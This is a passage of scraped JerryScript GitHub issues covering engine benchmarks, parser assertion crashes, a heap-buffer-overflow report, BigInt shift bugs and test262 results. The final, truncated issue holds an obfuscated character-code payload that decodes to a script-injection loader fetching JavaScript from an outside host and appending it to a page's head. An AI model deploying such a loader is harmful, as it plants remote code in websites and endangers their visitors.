What's the valid way. | very bigint add are failing | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4387/comments | 8 | 2020-12-29T08:21:31Z | 2020-12-29T22:23:13Z | https://github.com/jerryscript-project/jerryscript/issues/4387 | 775,766,935 | 4,387 |
[
"jerryscript-project",
"jerryscript"
]
| Refer to https://bellard.org/quickjs/bench.html
I am using the following branch to bench jerryscript
https://github.com/lygstate/jerryscript/tree/benchmark
Bench result:
Currently, the QuickJs `Splay` splay tree benchmark case are too slow exceptionally, this is more like an jerrscript issue
| | JerryScript ESNext | QuickJS | Ducktape | NodeJs Jitless | Node |
|---------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------|--------------------------------------------------------------------------------------------------|----------------------------|------------------|
| Compile/Run Option | python tools/build.py --clean --lto=OFF --jerry-debugger=ON --jerry-cmdline=ON<br>--jerry-cmdline-snapshot=ON --jerry-math=ON --jerry-ext=ON<br>--amalgam=ON --snapshot-exec=ON --stack-limit=512 --gc-mark-limit=64<br>--cpointer-32bit=ON --system-allocator=ON --external-context=ON<br>--regexp-strict-mode=ON --js-parser=ON --line-info=ON --error-messages=ON<br>--logging=ON --cmake-param=-GNinja --cmake-param=-DJERRY_LCACHE=1<br>--cmake-param=-DJERRY_PROPRETY_HASHMAP=1 --profile=es.next | qjs combined.js | gcc -O3 -DDUK_CMDLINE_CONSOLE_SUPPORT<br>duktape.c duk_cmdline.c duk_console.c<br>-lm -lc -o duk | node --jitless combined.js | node combined.js |
| Engine - Peak Memory Consumption (KB) | | | | | |
| Engine - Peak Stack Usage (KB) | | | | | |
| Binary size (Byte) | 239664 | 5523792 | 582240 | 73873464 | 73873464 |
| Standard compatibly | ES 2020 | ES 2020 | Part ES 2015 | ES 2020 | ES 2020 |
| Richards | 173 | 876 | 223 | 1188 | 36562 |
| DeltaBlue | 180 | 866 | 282 | 1345 | 67302 |
| Crypto | 182 | 1016 | 385 | 923 | 46090 |
| RayTrace | 291 | 1173 | 617 | 2880 | 52043 |
| EarleyBoyer | 408 | 1841 | 686 | 5101 | 55366 |
| RegExp | 155 | 255 | 221 | 2513 | 8866 |
| Splay | 365 | 1919 | 1296 | 4673 | 32091 |
| NavierStokes | 398 | 1701 | 1073 | 1657 | 51740 |
| TotalScore | 250 | 1042 | 487 | 2129 | 38483 | | V8 benchmark engines comparison | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4386/comments | 14 | 2020-12-29T07:12:25Z | 2021-06-08T05:39:12Z | https://github.com/jerryscript-project/jerryscript/issues/4386 | 775,741,712 | 4,386 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
9676500addbcc5974bf81f7b3726230d26f5c1a5
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-128-generic x86_64)
###### Build steps
```sh
./tools/build.py --clean --debug --logging=on
```
###### Test case
```js
P`${*\x10$
```
###### Execution steps & output
```
$ ./build/bin/jerry test.js
ICE: Assertion 'array_object_p->u.array.length_prop_and_hole_count & ECMA_ARRAY_TEMPLATE_LITERAL' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-collection.c(ecma_collection_free_template_literal):98.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
###### Backtrace
```
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1 0x00007ffff7a22921 in __GI_abort () at abort.c:79
#2 0x000055555555f76f in jerry_port_fatal (code=ERR_FAILED_INTERNAL_ASSERTION) at jerryscript/jerry-port/default/default-fatal.c:30
#3 0x00005555555ad43c in jerry_fatal (code=ERR_FAILED_INTERNAL_ASSERTION) at jerryscript/jerry-core/jrt/jrt-fatals.c:63
#4 0x00005555555ad48e in jerry_assert_fail (assertion=0x555555633670 "array_object_p->u.array.length_prop_and_hole_count & ECMA_ARRAY_TEMPLATE_LITERAL",
file=0x555555633618 "jerryscript/jerry-core/ecma/base/ecma-helpers-collection.c",
function=0x55555560e920 <__func__.4427.lto_priv.171> "ecma_collection_free_template_literal", line=98) at jerryscript/jerry-core/jrt/jrt-fatals.c:87
#5 0x00005555556034e4 in ecma_collection_free_template_literal (collection_p=0x55555584b588 <jerry_global_heap+872>)
at jerryscript/jerry-core/ecma/base/ecma-helpers-collection.c:98
#6 0x00005555555b5670 in parser_raise_error (context_p=0x7fffffffd670, error=PARSER_ERR_PRIMARY_EXP_EXPECTED) at jerryscript/jerry-core/parser/js/js-parser.c:2756
#7 0x0000555555570565 in parser_parse_unary_expression (context_p=0x7fffffffd670, grouping_level_p=0x7fffffffd420) at jerryscript/jerry-core/parser/js/js-parser-expr.c:2320
#8 0x00005555555738db in parser_parse_expression (context_p=0x7fffffffd670, options=0) at jerryscript/jerry-core/parser/js/js-parser-expr.c:3961
#9 0x000055555556f2f3 in parser_parse_tagged_template_literal (context_p=0x7fffffffd670) at jerryscript/jerry-core/parser/js/js-parser-expr.c:1823
#10 0x00005555555709fa in parser_process_unary_expression (context_p=0x7fffffffd670, grouping_level=0) at jerryscript/jerry-core/parser/js/js-parser-expr.c:2487
#11 0x0000555555573908 in parser_parse_expression (context_p=0x7fffffffd670, options=2) at jerryscript/jerry-core/parser/js/js-parser-expr.c:3970
#12 0x000055555557366e in parser_parse_block_expression (context_p=0x7fffffffd670, options=0) at jerryscript/jerry-core/parser/js/js-parser-expr.c:3910
#13 0x000055555555b52a in parser_parse_statements (context_p=0x7fffffffd670) at jerryscript/jerry-core/parser/js/js-parser-statm.c:3232
#14 0x00005555555b3fef in parser_parse_source (arg_list_p=0x0, arg_list_size=0, source_p=0x5555558cd4a0 "P`${*\\x10$\n", source_size=11, resource_name=593, parse_opts=0, error_location_p=0x7fffffffd8ec)
at jerryscript/jerry-core/parser/js/js-parser.c:2004
#15 0x00005555555b56d7 in parser_parse_script (arg_list_p=0x0, arg_list_size=0, source_p=0x5555558cd4a0 "P`${*\\x10$\n", source_size=11, resource_name=593, parse_opts=0)
at jerryscript/jerry-core/parser/js/js-parser.c:2799
#16 0x00005555555f8acd in jerry_parse (resource_name_p=0x7fffffffe0b6 "test3.js", resource_name_length=8, source_p=0x5555558cd4a0 "P`${*\\x10$\n", source_size=11, parse_opts=0)
at jerryscript/jerry-core/api/jerry.c:459
#17 0x00005555555f5e8f in main (argc=2, argv=0x7fffffffdcb8) at jerryscript/jerry-main/main-unix.c:112
```
| Assertion 'array_object_p->u.array.length_prop_and_hole_count & ECMA_ARRAY_TEMPLATE_LITERAL' failed at ecma_collection_free_template_literal | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4385/comments | 0 | 2020-12-29T01:12:16Z | 2021-01-08T12:07:35Z | https://github.com/jerryscript-project/jerryscript/issues/4385 | 775,648,492 | 4,385 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
9676500addbcc5974bf81f7b3726230d26f5c1a5
###### Build platform
```
C:\Users\lygstate>python -c "import platform; print(platform.platform())"
Windows-10-10.0.19041-SP0
```
###### Build steps
For ES 5.1
```
PS C:\work\study\languages\typescript\jerryscript> python tools/run-tests.py --test262
Build command:
cmd \
/S \
/C \
C:\work\study\languages\typescript\jerryscript\tools\build.py \
--profile=es5.1 \
--builddir=C:\work\study\languages\typescript\jerryscript\build\tests\test262_tests \
--install=C:\work\study\languages\typescript\jerryscript\build\tests\test262_tests\local
Test command:
TZ='America/Los_Angeles' \
cmd \
/S \
/C \
C:\work\study\languages\typescript\jerryscript\tools\runners/run-test-suite-test262.py \
--engine \
C:\work\study\languages\typescript\jerryscript\build\tests\test262_tests\local\bin\jerry.exe --test262-object \
--test-dir \
C:\work\study\languages\typescript\jerryscript\tests/test262 \
--es51
.................................................. Executed 5000 tests.
.................................................. Executed 10000 tests.
.................
=== Summary ===
- Ran 11725 tests
- Passed 11557 tests (98.6%)
- Failed 168 tests (1.4%)
```
For ES6
```
PS C:\work\study\languages\typescript\jerryscript> python tools/run-tests.py --test262-es2015 update
Build command:
cmd \
/S \
/C \
C:\work\study\languages\typescript\jerryscript\tools\build.py \
--profile=es.next \
--line-info=on \
--error-messages=on \
--builddir=C:\work\study\languages\typescript\jerryscript\build\tests\test262_tests_es2015 \
--install=C:\work\study\languages\typescript\jerryscript\build\tests\test262_tests_es2015\local
Test command:
TZ='America/Los_Angeles' \
cmd \
/S \
/C \
C:\work\study\languages\typescript\jerryscript\tools\runners/run-test-suite-test262.py \
--engine \
C:\work\study\languages\typescript\jerryscript\build\tests\test262_tests_es2015\local\bin\jerry.exe --test262-object \
--test-dir \
C:\work\study\languages\typescript\jerryscript\tests/test262 \
--es2015 \
update
.................................................. Executed 5000 tests.
.................................................. Executed 10000 tests.
.................................................. Executed 15000 tests.
ERROR:root:Error disposing temp file: [WinError 32] 另一个程序正在使用此文件,进程无法访问。: 'C:\\Users\\lygstate\\AppData\\Local\\Temp\\test262-out-kkxx3goy'
ERROR:root:Error disposing temp file: [WinError 32] 另一个程序正在使用此文件,进程无法访问。: 'C:\\Users\\lygstate\\AppData\\Local\\Temp\\test262-out-x6oy5j1s'
ERROR:root:Error disposing temp file: [WinError 32] 另一个程序正在使用此文件,进程无法访问。: 'C:\\Users\\lygstate\\AppData\\Local\\Temp\\test262-err-nj697qhg'
ERROR:root:Error disposing temp file: [WinError 32] 另一个程序正在使用此文件,进程无法访问。: 'C:\\Users\\lygstate\\AppData\\Local\\Temp\\test262-err-ymdteaqd'
ERROR:root:Error disposing temp file: [WinError 32] 另一个程序正在使用此文件,进程无法访问。: 'C:\\Users\\lygstate\\AppData\\Local\\Temp\\test262-out-5b09cyb1'
ERROR:root:Error disposing temp file: [WinError 32] 另一个程序正在使用此文件,进程无法访问。: 'C:\\Users\\lygstate\\AppData\\Local\\Temp\\test262-out-10s2ozab'
ERROR:root:Error disposing temp file: [WinError 32] 另一个程序正在使用此文件,进程无法访问。: 'C:\\Users\\lygstate\\AppData\\Local\\Temp\\test262-err-dzy30erw'
ERROR:root:Error disposing temp file: [WinError 32] 另一个程序正在使用此文件,进程无法访问。: 'C:\\Users\\lygstate\\AppData\\Local\\Temp\\test262-err-wfrmjsp4'
.................................................. Executed 20000 tests.
.................................................. Executed 25000 tests.
ERROR:root:Error disposing temp file: [WinError 32] 另一个程序正在使用此文件,进程无法访问。: 'C:\\Users\\lygstate\\AppData\\Local\\Temp\\test262-out-qu8dgc37'
ERROR:root:Error disposing temp file: [WinError 32] 另一个程序正在使用此文件,进程无法访问。: 'C:\\Users\\lygstate\\AppData\\Local\\Temp\\test262-out-e_0fjy1l'
ERROR:root:Error disposing temp file: [WinError 32] 另一个程序正在使用此文件,进程无法访问。: 'C:\\Users\\lygstate\\AppData\\Local\\Temp\\test262-err-k3yhbr7v'
ERROR:root:Error disposing temp file: [WinError 32] 另一个程序正在使用此文件,进程无法访问。: 'C:\\Users\\lygstate\\AppData\\Local\\Temp\\test262-err-41uefzcl'
.....................................
=== Summary ===
- Ran 28709 tests
- Passed 28070 tests (97.8%)
- Failed 639 tests (2.2%)
=== Summary - updating excludelist ===
New failing tests added to the excludelist
built-ins/String/raw/special-characters.js
language/expressions/template-literal/tv-line-continuation.js
language/expressions/template-literal/tv-line-terminator-sequence.js
Excludelist was updated succesfully.
```
ESNEXT built-ins,annexB,harness,intl402
```
PS C:\work\study\languages\typescript\jerryscript> python tools/run-tests.py --test262-esnext update --test262-test-list built-ins,annexB,harness,intl402
Build command:
cmd \
/S \
/C \
C:\work\study\languages\typescript\jerryscript\tools\build.py \
--profile=es.next \
--line-info=on \
--error-messages=on \
--mem-heap=20480 \
--builddir=C:\work\study\languages\typescript\jerryscript\build\tests\test262_tests_esnext \
--install=C:\work\study\languages\typescript\jerryscript\build\tests\test262_tests_esnext\local
Test command:
TZ='America/Los_Angeles' \
cmd \
/S \
/C \
C:\work\study\languages\typescript\jerryscript\tools\runners/run-test-suite-test262.py \
--engine \
C:\work\study\languages\typescript\jerryscript\build\tests\test262_tests_esnext\local\bin\jerry.exe --test262-object \
--test-dir \
C:\work\study\languages\typescript\jerryscript\tests/test262 \
--esnext \
update \
--test262-test-list \
built-ins,annexB,harness,intl402
Cloning into 'C:\work\study\languages\typescript\jerryscript\tests/test262\esnext'...
remote: Enumerating objects: 99, done.
remote: Counting objects: 100% (99/99), done.
remote: Compressing objects: 100% (76/76), done.
Receiving objects: 100% (316202/316202), 89.99 MiB | 3.70 MiB/s, done.103 eceiving objects: 100% (316202/316202), 88.11 MiB | 6.56 MiB/s
Resolving deltas: 100% (268501/268501), done.
Updating files: 100% (46022/46022), done.
Note: switching to '281eb10b2844929a7c0ac04527f5b42ce56509fd'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 281eb10b28 Intl.DateTimeFormat.{formatRange,formatRangeToParts} should throw TypeError instead of RangeError if either of parameter is undefined (#2685)
.................................................. Executed 10000 tests.
.................................................. Executed 15000 tests.
.................................................. Executed 20000 tests.
.................................................. Executed 25000 tests.
.................................................. Executed 30000 tests.
..........................................
=== Summary ===
- Ran 34297 tests
- Passed 28527 tests (83.2%)
- Failed 5770 tests (16.8%)
=== Summary - updating excludelist ===
New failing tests added to the excludelist
built-ins/String/raw/special-characters.js
Excludelist was updated succesfully.
```
ESNEXT language
```
PS C:\work\study\languages\typescript\jerryscript> python tools/run-tests.py --test262-esnext update --test262-test-list language
Build command:
cmd \
/S \
/C \
C:\work\study\languages\typescript\jerryscript\tools\build.py \
--profile=es.next \
--line-info=on \
--error-messages=on \
--mem-heap=20480 \
--builddir=C:\work\study\languages\typescript\jerryscript\build\tests\test262_tests_esnext \
--install=C:\work\study\languages\typescript\jerryscript\build\tests\test262_tests_esnext\local
Test command:
TZ='America/Los_Angeles' \
cmd \
/S \
/C \
C:\work\study\languages\typescript\jerryscript\tools\runners/run-test-suite-test262.py \
--engine \
C:\work\study\languages\typescript\jerryscript\build\tests\test262_tests_esnext\local\bin\jerry.exe --test262-object \
--test-dir \
C:\work\study\languages\typescript\jerryscript\tests/test262 \
--esnext \
update \
--test262-test-list \
language
.................................................. Executed 5000 tests.
.................................................. Executed 10000 tests.
.................................................. Executed 15000 tests.
.................................................. Executed 20000 tests.
.................................................. Executed 25000 tests.
.................................................. Executed 30000 tests.
.................................................. Executed 35000 tests.
.................................................. Executed 40000 tests.
........
=== Summary ===
- Ran 40835 tests
- Passed 30743 tests (75.3%)
- Failed 10092 tests (24.7%)
=== Summary - updating excludelist ===
New failing tests added to the excludelist
language/expressions/template-literal/tv-line-continuation.js
language/expressions/template-literal/tv-line-terminator-sequence.js
language/literals/string/line-continuation-double.js
language/literals/string/line-continuation-single.js
Excludelist was updated succesfully.
``` | test262 are not match unix testing result on windows | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4384/comments | 2 | 2020-12-28T18:44:32Z | 2021-01-09T05:28:43Z | https://github.com/jerryscript-project/jerryscript/issues/4384 | 775,537,084 | 4,384 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
9676500addbcc5974bf81f7b3726230d26f5c1a5
###### Build platform
- Ubuntu 18.04.5 LTS (Linux 4.15.0-128-generic x86_64)
- The C compiler identification is Clang 8.0.0
###### Build steps
```sh
CC=clang python tools/build.py --compile-flag=-fsanitize=address --lto=off --clean --debug --logging=on
```
###### Test case
```js
1_
```
Note that there must be NO NEWLINE at the end of file!
###### Output
```
$ ./build/bin/jerry test.js
=================================================================
==30070==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000012 at pc 0x0000006d21b0 bp 0x7ffccb298280 sp 0x7ffccb298278
READ of size 1 at 0x602000000012 thread T0
#0 0x6d21af in lexer_check_numbers jerryscript/jerry-core/parser/js/js-lexer.c:1333:24
#1 0x6c0107 in lexer_parse_number jerryscript/jerry-core/parser/js/js-lexer.c:1483:5
#2 0x6b9928 in lexer_next_token jerryscript/jerry-core/parser/js/js-lexer.c:1659:5
#3 0x60dd84 in scanner_scan_all jerryscript/jerry-core/parser/js/js-scanner.c:2518:7
#4 0x5f6ddc in parser_parse_source jerryscript/jerry-core/parser/js/js-parser.c:1896:3
#5 0x5f5aea in parser_parse_script jerryscript/jerry-core/parser/js/js-parser.c:2799:38
#6 0x4febf2 in jerry_parse jerryscript/jerry-core/api/jerry.c:459:43
#7 0x4f6738 in main jerryscript/jerry-main/main-unix.c:112:21
#8 0x7f5687747bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
#9 0x41b019 in _start (jerryscript/build/bin/jerry+0x41b019)
0x602000000012 is located 0 bytes to the right of 2-byte region [0x602000000010,0x602000000012)
allocated by thread T0 here:
#0 0x4c69c3 in malloc /tmp/tmp.XYTE7P6bCb/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
#1 0x71655f in jerry_port_read_source jerryscript/jerry-port/default/default-module.c:70:35
#2 0x4f63cf in main jerryscript/jerry-main/main-unix.c:82:25
#3 0x7f5687747bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: heap-buffer-overflow jerryscript/jerry-core/parser/js/js-lexer.c:1333:24 in lexer_check_numbers
Shadow bytes around the buggy address:
0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c047fff8000: fa fa[02]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==30070==ABORTING
```
| heap-buffer-overflow in lexer_check_numbers | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4375/comments | 0 | 2020-12-28T00:24:28Z | 2021-01-06T06:30:10Z | https://github.com/jerryscript-project/jerryscript/issues/4375 | 775,134,928 | 4,375 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
608325903030766f2894ba5641644cb7ccc5d3a4
(latest master - 2020.12.15.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test cases
test262-esnext test:
- built-ins/Function/prototype/bind/get-fn-realm-recursive.js
- built-ins/Function/prototype/bind/get-fn-realm.js
- built-ins/Proxy/get-fn-realm.js
- built-ins/TypedArrayConstructors/ctors/typedarray-arg/detached-when-species-retrieved-different-type.js
- built-ins/TypedArrayConstructors/ctors/typedarray-arg/detached-when-species-retrieved-same-type.js
- built-ins/TypedArrayConstructors/ctors-bigint/typedarray-arg/detached-when-species-retrieved-different-type.js
- built-ins/TypedArrayConstructors/ctors-bigint/typedarray-arg/detached-when-species-retrieved-same-type.js
###### Output
```
ICE: Assertion 'ecma_get_object_type (func_obj_p) == ECMA_OBJECT_TYPE_NATIVE_FUNCTION' failed at /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c(ecma_op_function_get_function_realm):806.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
###### Expected behavior
not assert | Assertion 'ecma_get_object_type (func_obj_p) == ECMA_OBJECT_TYPE_NATIVE_FUNCTION' in ecma_op_function_get_function_realm | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4366/comments | 5 | 2020-12-15T10:43:24Z | 2021-01-18T13:50:06Z | https://github.com/jerryscript-project/jerryscript/issues/4366 | 767,449,701 | 4,366 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
c0fc67f5bd24ee15576cc326007e46395b27f247
###### Build platform
Ubuntu 18.04.4 LTS (Linux 5.4.0-42-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --show-opcodes=ON
```
###### Run steps
```
build/bin/jerry work.js --show-opcodes
```
###### Test case
```javascript
function f () {}
```
###### Output
```
--- Script parsing start ---
--- Scanning start ---
FUNCTION: flags: 0x4 declarations: 2 source:0
FUNC * 'f'
FUNCTION: flags: 0x0 declarations: 0 source:54
--- Scanning end ---
[ 0] CBC_CHECK_VAR idx:0->ident(f)
[ 0] CBC_CREATE_VAR_FUNC_EVAL IDX:1->unknown IDX:0->ident(f)
--- Function parsing start ---
Byte code dump:
Maximum stack depth: 0
Flags: [small_lit_enc,no_lexical_env]
Argument range end: 0
Register range end: 0
Identifier range end: 0
Const literal range end: 1
Literal range end: 1
0 : CBC_RETURN_WITH_BLOCK
Byte code size: 1 bytes
--- Function parsing end ---
Byte code dump:
Maximum stack depth: 0
Flags: [small_lit_enc]
Argument range end: 0
Register range end: 0
Identifier range end: 1
Const literal range end: 2
Literal range end: 3
0 : CBC_CHECK_VAR ident:0->string(f)
2 : CBC_CREATE_VAR_FUNC_EVAL const:2->ICE: Assertion 'ecma_is_value_string (value)' failed at /home/fancsikrobi/harmony/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c(ecma_get_string_from_value):791.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
###### Error investigation
- I've bisected the error, the revision which breaks this testcase: 640a7d33b3565bea0d8931585d5d0c3833e1ee93 (#4327) | ICE: Assertion 'ecma_is_value_string (value)' | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4353/comments | 0 | 2020-12-02T12:43:58Z | 2020-12-11T12:59:49Z | https://github.com/jerryscript-project/jerryscript/issues/4353 | 755,242,225 | 4,353 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
5d916fb8d4cd944ff985bcbc89cfde017425744d
###### Build platform
Ubuntu 18.04.4 LTS (Linux 5.4.0-42-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g \
--strip=off --system-allocator=on --logging=on \
--linker-flag=-fuse-ld=gold --error-messages=on --stack-limit=16
```
###### Test case
```javascript
-1n << ~(2n ** 32n)
```
###### Output
```javascript
0
```
###### Expected output (verified by V8 and SpiderMonkey)
```javascript
-1n
```
###### Advice for the error investigation:
Potential integer overflow based on these evaluation results.
```javascript
jerry> -1n << ~(2n ** 32n)
0
jerry> -1n << ~((2n ** 32n) - 1n)
0
jerry> -1n << ~((2n ** 32n) - 2n)
-1
jerry> -1n << ~((2n ** 32n) - 3n)
-1
// -1n << ~(2n ** 32n) -{4, 5, 6 ... } give the correct result
```
<sup>Found by [Fuzzinator](http://fuzzinator.readthedocs.io/) with [grammarinator](https://github.com/renatahodovan/grammarinator).</sup> | Incorrect result for Bigint left shift | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4342/comments | 3 | 2020-11-17T17:21:30Z | 2021-01-05T11:41:25Z | https://github.com/jerryscript-project/jerryscript/issues/4342 | 744,932,130 | 4,342 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
5d916fb8d4cd944ff985bcbc89cfde017425744d
###### Build platform
Ubuntu 18.04.4 LTS (Linux 5.4.0-42-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g \
--strip=off --system-allocator=on --logging=on \
--linker-flag=-fuse-ld=gold --error-messages=on --stack-limit=16
```
###### Test case
```javascript
-1n >> (2n ** 32n)
```
###### Output
```javascript
0
```
###### Expected output (verified by V8 and SpiderMonkey)
```javascript
-1n
```
###### Advice for the error investigation:
Potential integer overflow since the following code snippet **evaluates to** `true`.
```javascript
-1n >> ((2n ** 32n) - 1n) === -1n
```
<sup>Found by [Fuzzinator](http://fuzzinator.readthedocs.io/) with [grammarinator](https://github.com/renatahodovan/grammarinator).</sup> | Incorrect result for Bigint right shift | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4341/comments | 0 | 2020-11-17T17:06:49Z | 2021-01-07T11:45:11Z | https://github.com/jerryscript-project/jerryscript/issues/4341 | 744,920,666 | 4,341 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
25bb5083be896bb70d175ff9ef2fdd5e8a31ff45
(latest master - 2020.11.10.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --compile-flag=-m32
###### Test case
test262/esnext
-- language/types/number/S8.5_A2.1.js
-- language/types/number/S8.5_A2.2.js
minimal test case: 9007199254740994 + 0.9999847412109375
(note: 9007199254740994 == 2^53 + 2 and 0.9999847412109375 == 1.0 - 1/65536.0)
###### Output
9007199254740996, but the expected output is 9007199254740994 | Number operations with big numbers are inaccurate on 32 bit | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4334/comments | 2 | 2020-11-12T09:03:35Z | 2020-11-12T11:36:06Z | https://github.com/jerryscript-project/jerryscript/issues/4334 | 741,414,728 | 4,334 |
[
"jerryscript-project",
"jerryscript"
]
| For example:
`print(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 53, 48, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 